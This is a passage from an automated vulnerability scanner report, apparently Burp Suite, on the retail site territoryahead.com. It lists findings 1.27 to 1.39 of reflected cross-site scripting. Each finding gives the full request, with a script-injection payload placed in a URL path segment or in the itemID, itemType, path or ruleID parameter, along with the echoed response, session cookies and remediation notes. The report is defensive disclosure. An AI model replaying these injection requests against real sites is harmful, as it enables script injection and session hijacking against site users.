Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wdJq@qwSrRQAAHAHEa8AAAAv
REDIRECT_SCRIPT_URL: /menu/mmenudom.jsfdcb5--><script>alert(1)</script>6b6b99bd582
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu/mmenudom.jsfdcb5-->
...[SNIP]...

1.27. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d79c9--><script>alert(1)</script>d1e96091030 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shoppingd79c9--><script>alert(1)</script>d1e96091030/mercado/style/searchResults.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:18:04 GMT
Server: Apache
ETag: "AAAAS53/7WT"
Last-Modified: Wed, 02 Mar 2011 19:16:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62382010; Path=/; Expires=Wed, 16-Mar-2011 19:16:09 GMT
Set-Cookie: customer=92645757; Path=/; Expires=Thu, 28-Feb-2019 19:16:09 GMT
Set-Cookie: mmlID=68410305; Path=/; Expires=Thu, 28-Feb-2019 19:16:09 GMT
Set-Cookie: JSESSIONID=bTr7Zg1Rbv26; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
_UNIQUE_ID: xatD-KwSrRQAABCSmtgAAAAM
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shoppingd79c9--><script>alert(1)</script>d1e96091030/mercado/style/searchResults.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shoppingd79c9-->
...[SNIP]...

1.28. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b1fca--><script>alert(1)</script>f6e066f6d1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shopping/mercadob1fca--><script>alert(1)</script>f6e066f6d1a/style/searchResults.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:21 GMT
Server: Apache
ETag: "AAAAS53/HE6"
Last-Modified: Wed, 02 Mar 2011 19:12:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381931; Path=/; Expires=Wed, 16-Mar-2011 19:12:35 GMT
Set-Cookie: customer=92646105; Path=/; Expires=Thu, 28-Feb-2019 19:12:35 GMT
Set-Cookie: mmlID=68410503; Path=/; Expires=Thu, 28-Feb-2019 19:12:35 GMT
Set-Cookie: JSESSIONID=eZKXaLc4KYb9; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
ID: 5uIku6wSrSgAAD2OI4MAAAAn
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shopping/mercadob1fca--><script>alert(1)</script>f6e066f6d1a/style/searchResults.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shopping/mercadob1fca-->
...[SNIP]...

1.29. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 31895--><script>alert(1)</script>c76e908cfde was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shopping/mercado/style31895--><script>alert(1)</script>c76e908cfde/searchResults.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:18:17 GMT
Server: Apache
ETag: "AAAAS53/+iP"
Last-Modified: Wed, 02 Mar 2011 19:16:23 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62382043; Path=/; Expires=Wed, 16-Mar-2011 19:16:22 GMT
Set-Cookie: customer=92645790; Path=/; Expires=Thu, 28-Feb-2019 19:16:22 GMT
Set-Cookie: mmlID=68410338; Path=/; Expires=Thu, 28-Feb-2019 19:16:22 GMT
Set-Cookie: JSESSIONID=bfs4vpOyb6ub; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
IHq6wSrRQAAE0b@voAAAAe
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shopping/mercado/style31895--><script>alert(1)</script>c76e908cfde/searchResults.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shopping/mercado/style31895-->
...[SNIP]...

1.30. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 65309--><script>alert(1)</script>4a214804e75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shopping/mercado/style/searchResults.css65309--><script>alert(1)</script>4a214804e75 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:33 GMT
Server: Apache
ETag: "AAAAS54AAh8"
Last-Modified: Wed, 02 Mar 2011 19:16:31 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62382071; Path=/; Expires=Wed, 16-Mar-2011 19:16:31 GMT
Set-Cookie: customer=92646318; Path=/; Expires=Thu, 28-Feb-2019 19:16:31 GMT
Set-Cookie: mmlID=68410366; Path=/; Expires=Thu, 28-Feb-2019 19:16:31 GMT
Set-Cookie: JSESSIONID=bLREHBcbm_H8; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
AAAR
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shopping/mercado/style/searchResults.css65309--><script>alert(1)</script>4a214804e75
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shopping/mercado/style/searchResults.css65309-->
...[SNIP]...

1.31. http://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 40fb8--><script>alert(1)</script>003ed39f7ff869e3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates40fb8--><script>alert(1)</script>003ed39f7ff869e3c/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Mar 2011 18:52:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
n: Keep-Alive
Connection: Keep-Alive
UNIQUE_ID: aTsLyawSrSgAAFLsEqIAAAEV
nokeepalive: 1
ssl-unclean-shutdown: 1
downgrade-1.0: 1
force-response-1.0: 1
SCRIPT_URL: /templates40fb8--><script>alert(1)</script>003ed39f7ff869e3c/custservcontactus.jsp
SCRIPT_URI: http://www.territoryahead.com/templates40fb8-->
...[SNIP]...

1.32. http://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f90f1--><script>alert(1)</script>a2b2eaaefe415af6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jspf90f1--><script>alert(1)</script>a2b2eaaefe415af6c?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:43:05 GMT
Server: Apache
ETag: "AAAAS5334A8"
Last-Modified: Wed, 02 Mar 2011 18:40:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
AAFjZAcYAAADU
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /templates/custservcontactus.jspf90f1--><script>alert(1)</script>a2b2eaaefe415af6c
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/templates/custservcontactus.jspf90f1-->
...[SNIP]...

1.33. http://www.territoryahead.com/templates/custservcontactus.jsp [itemID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the itemID request parameter is copied into an HTML comment. The payload 45a90--><script>alert(1)</script>43dd353bdf3a7be2f was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=23645a90--><script>alert(1)</script>43dd353bdf3a7be2f&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:52:07 GMT
Server: Apache
ETag: "AAAAS5332VB"
Last-Modified: Wed, 02 Mar 2011 18:40:52 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
om/errorhandler.jsp?ruleID=8&ruleID=145&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=145&itemID=23645a90--><script>alert(1)</script>43dd353bdf3a7be2f&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: aTtg_UkbQc6f (from cookie)

Parameters:
submit.y = 13
submit.y = 13
ruleID
...[SNIP]...

1.34. http://www.territoryahead.com/templates/custservcontactus.jsp [itemType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the itemType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831c1"><script>alert(1)</script>458d6a39f0728d841 was submitted in the itemType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY831c1"><script>alert(1)</script>458d6a39f0728d841&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:43:00 GMT
Server: Apache
ETag: "AAAAS5332tx"
Last-Modified: Wed, 02 Mar 2011 18:40:54 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY831c1"><script>alert(1)</script>458d6a39f0728d841&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.35. http://www.territoryahead.com/templates/custservcontactus.jsp [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the path request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7fa"><script>alert(1)</script>e1e7dc8b031f72cf was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2367e7fa"><script>alert(1)</script>e1e7dc8b031f72cf&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:52:09 GMT
Server: Apache
ETag: "AAAAS53322A"
Last-Modified: Wed, 02 Mar 2011 18:40:54 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2367e7fa"><script>alert(1)</script>e1e7dc8b031f72cf&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.36. http://www.territoryahead.com/templates/custservcontactus.jsp [ruleID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the ruleID request parameter is copied into an HTML comment. The payload 5b8e8--><script>alert(1)</script>5080cc77d69cd4dfb was submitted in the ruleID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jsp?ruleID=1455b8e8--><script>alert(1)</script>5080cc77d69cd4dfb&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:42:58 GMT
Server: Apache
ETag: "AAAAS5332LN"
Last-Modified: Wed, 02 Mar 2011 18:40:51 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
ipt%3Ealert%281%29%3C%2Fscript%3E5080cc77d69cd4dfb&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=1455b8e8--><script>alert(1)</script>5080cc77d69cd4dfb&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: aTtg_UkbQc6f (from cookie)

Parameters:
submit.y = 13
submit.y = 13
...[SNIP]...

1.37. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/cmdatatagutils_territoryahead.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d2219--><script>alert(1)</script>99acf92d2db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textd2219--><script>alert(1)</script>99acf92d2db/cm/cmdatatagutils_territoryahead.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:13 GMT
Server: Apache
ETag: "AAAAS53+4e6"
Last-Modified: Wed, 02 Mar 2011 19:11:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wqQWQqwSrRQAABCQmNsAAAAC
REDIRECT_SCRIPT_URL: /textd2219--><script>alert(1)</script>99acf92d2db/cm/cmdatatagutils_territoryahead.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textd2219-->
...[SNIP]...

1.38. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/cmdatatagutils_territoryahead.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload e9f54--><script>alert(1)</script>dcd4db6be5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cme9f54--><script>alert(1)</script>dcd4db6be5d/cmdatatagutils_territoryahead.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:23 GMT
Server: Apache
ETag: "AAAAS53+43K"
Last-Modified: Wed, 02 Mar 2011 19:11:37 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 42nuUqwSrSgAAGbiDpUAAAAF
REDIRECT_SCRIPT_URL: /text/cme9f54--><script>alert(1)</script>dcd4db6be5d/cmdatatagutils_territoryahead.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cme9f54-->
...[SNIP]...

1.39. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/cmdatatagutils_territoryahead.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 876b8--><script>alert(1)</script>898944d08eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cm/cmdatatagutils_territoryahead.js876b8--><script>alert(1)</script>898944d08eb HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:16 GMT
Server: Apache
ETag: "AAAAS53+5Q0"
Last-Modified: Wed, 02 Mar 2011 19:11:39 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wtTVZ6wSrRQAAG-5D0EAAAAG
REDIRECT_SCRIPT_URL: /text/cm/cmdatatagutils_territoryahead.js876b8--><script>alert(1)</script>898944d08eb
